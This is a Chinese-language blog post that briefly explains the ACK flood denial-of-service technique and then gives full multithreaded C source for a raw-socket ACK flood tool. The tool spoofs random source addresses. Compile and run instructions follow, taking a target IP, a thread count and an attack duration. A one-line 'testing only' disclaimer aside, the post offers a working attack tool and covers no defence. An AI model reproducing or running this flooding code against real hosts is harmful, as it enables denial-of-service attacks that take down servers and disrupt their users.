一款强大的ACK攻击器源代码

  • 内容
  • 相关

一款强大的ACK攻击器源代码

标签:

分类:网络安全

评论:0条

更新日期:2018-2-28

观看次数:631次

剧情介绍

ack flood攻击同样是利用TCP三次握手的缺陷实现的攻击, ack flood攻击利用的是三次握手的第二段,也就是TCP标志位syn和ack都置1,攻击主机伪造海量的 虚假ack包发送给目标主机,目标主机每收到一个带有 ack标志位的数据包时,都会去自己的TCP连接表中查看有没有与ack的发送者建立连接 ,如果有则发送三次握手的第三段ack+seq完成三次握手,成功 建立TCP连接。如果没有则发送ack+rst 断开连接。但是在这个过程中会消耗一定的CUP计算资源,如果瞬间 收到海量的syn+ack数据包将会 消耗大量的cpu资源使得正常的连接无法建立或者增加延迟,甚至造成服务器瘫痪、死机。 理论上目标主机的TCP连接越多ack攻击效果越好,所以如果syn flood与ack flood配合使用效果会更明显。下面的代码采用多线程威力非常大,仅供测试,切勿非法使用,实现代码如下(后面有已编译的脚本直接可用):/* * ack code author:minet */ #include <unistd.h> #include <time.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <pthread.h> #include <netinet/tcp.h> #include <netinet/ip.h> #include <netinet/in.h> #include <netinet/if_ether.h> #include <netdb.h> #include <net/if.h> #include <arpa/inet.h> #define MAX_PACKET_SIZE 65534 #define PHI 0x9e3779b9 static unsigned long int Q[4096], c = 362436; volatile int limiter; volatile unsigned int pps; volatile unsigned int sleeptime = 100; void init_rand(unsigned long int x) { int i; Q[0] = x; Q[1] = x + PHI; Q[2] = x + PHI + PHI; for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; } } unsigned long int rand_cmwc(void) { unsigned long long int t, a = 18782LL; static unsigned long int i = 4095; unsigned long int x, r = 0xfffffffe; i = (i + 1) & 4095; t = a * Q[i] + c; c = (t >> 32); x = t + c; if (x < c) { x++; c++; } return (Q[i] = r - x); } unsigned short csum (unsigned short *buf, int count) { register unsigned long sum = 0; while( count > 1 ) { sum += *buf++; count -= 2; } if(count > 0) { sum += *(unsigned char *)buf; } while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); } return (unsigned short)(~sum); } unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) { struct tcp_pseudo { unsigned long src_addr; unsigned long dst_addr; unsigned char zero; unsigned char proto; unsigned short length; } pseudohead; unsigned short total_len = iph->tot_len; pseudohead.src_addr=iph->saddr; pseudohead.dst_addr=iph->daddr; pseudohead.zero=0; pseudohead.proto=IPPROTO_TCP; pseudohead.length=htons(sizeof(struct tcphdr)); int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr); unsigned short *tcp = malloc(totaltcp_len); memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo)); memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr)); unsigned short output = csum(tcp,totaltcp_len); free(tcp); return output; } void setup_ip_header(struct iphdr *iph) { iph->ihl = 5; iph->version = 4; iph->tos = 0; iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr); iph->id = htonl(54321); iph->frag_off = 0; iph->ttl = MAXTTL; iph->protocol = 6; iph->check = 0; iph->saddr = inet_addr("192.168.3.100"); } void setup_tcp_header(struct tcphdr *tcph) { tcph->source = rand(); tcph->seq = rand(); tcph->ack_seq = rand(); tcph->res2 = 0; tcph->doff = 5; tcph->ack = 1; tcph->window = rand(); tcph->check = 0; tcph->urg_ptr = 0; } void *flood(void *par1) { char *td = (char *)par1; char datagram[MAX_PACKET_SIZE]; struct iphdr *iph = (struct iphdr *)datagram; struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr); struct sockaddr_in sin; sin.sin_family = AF_INET; sin.sin_port = rand(); sin.sin_addr.s_addr = inet_addr(td); int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP); if(s < 0){ fprintf(stderr, "无法打开原始套接字..\n"); exit(-1); } memset(datagram, 0, MAX_PACKET_SIZE); setup_ip_header(iph); setup_tcp_header(tcph); tcph->dest = rand(); iph->daddr = sin.sin_addr.s_addr; iph->check = csum ((unsigned short *) datagram, iph->tot_len); int tmp = 1; const int *val = &tmp; if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){ fprintf(stderr, "无法设置HDRINCL..\n"); exit(-1); } init_rand(time(NULL)); register unsigned int i; i = 0; while(1){ sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin)); iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF); iph->id = htonl(rand_cmwc() & 0xFFFFFFFF); iph->check = csum ((unsigned short *) datagram, iph->tot_len); tcph->seq = rand_cmwc() & 0xFFFF; tcph->source = htons(rand_cmwc() & 0xFFFF); tcph->check = 0; tcph->check = tcpcsum(iph, tcph); pps++; if(i >= limiter) { i = 0; usleep(sleeptime); } i++; } } int main(int argc, char *argv[ ]) { if(argc < 5){ fprintf(stderr, "请按照格式输入正确的参数\n"); fprintf(stdout, "启动格式: %s <目标IP> <线程数量> <流量限制/-1为不限制/填-1即可> <攻击时间/按照秒计时>\n", argv[0]); exit(-1); } fprintf(stdout, "设置套接字…\n"); int num_threads = atoi(argv[2]); int maxpps = atoi(argv[3]); limiter = 0; pps = 0; pthread_t thread[num_threads]; int multiplier = 100; int i; for(i = 0;i<num_threads;i++){ pthread_create( &thread[i], NULL, &flood, (void *)argv[1]); } fprintf(stdout, "开始攻击..\n"); for(i = 0;i<(atoi(argv[4])*multiplier);i++) { usleep((1000/multiplier)*1000); if((pps*multiplier) > maxpps) { if(1 > limiter) { sleeptime+=100; } else { limiter--; } } else { limiter++; if(sleeptime > 25) { sleeptime-=25; } else { sleeptime = 0; } } pps = 0; } return 0; }将脚本上传到服务器,然后编译使用以下命令对源代码进行编译gcc 脚本名称.c -o 脚本名称 -lpthread或者gcc 脚本名称.c -lpthread -lpcap -o 脚本名称编译完成后需要对该脚本赋予足够的权限chmod 755 脚本名称然后即可开始测试,输入命令./ack 目标IP 线程数量 流量限制/-1为不限制/填-1即可 攻击时间/按照秒计时, 例如:./ack 127.0.0.1 10 -1 300 

播放地址

本文标签:

版权声明:若无特殊注明,本文皆为《admin》原创,转载请保留文章出处。

百度已收录

本文链接:一款强大的ACK攻击器源代码 - https://blog.56jr.cn/WangLuo/66.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

未显示?请点击刷新

允许邮件通知

大家都在搜

00:00 / 00:00
顺序播放